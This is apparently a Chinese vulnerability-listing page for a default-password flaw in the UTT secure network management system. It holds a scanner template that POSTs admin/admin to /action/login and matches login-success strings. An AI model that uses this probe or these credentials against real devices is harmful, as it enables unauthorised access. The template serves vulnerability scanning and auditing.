utt-default-password: utt-default-password

日期: 2025-09-01 | 影响软件: utt default password | POC: 已公开

漏洞描述

app="UTT-安全网络管理系统"

PoC代码[已公开]

id: utt-default-password

info:
    name: utt-default-password
    author: zan8in
    severity: high
    verified: true
    description: app="UTT-安全网络管理系统"

rules:
    r0:
        request:
            method: POST
            path: /action/login
            body: username=admin&password=admin
        expression: response.status == 200 && response.body.bcontains(b"var time=0;") && response.body.bcontains(b"var leftPwdNums=0;")
expression: r0()

相关漏洞推荐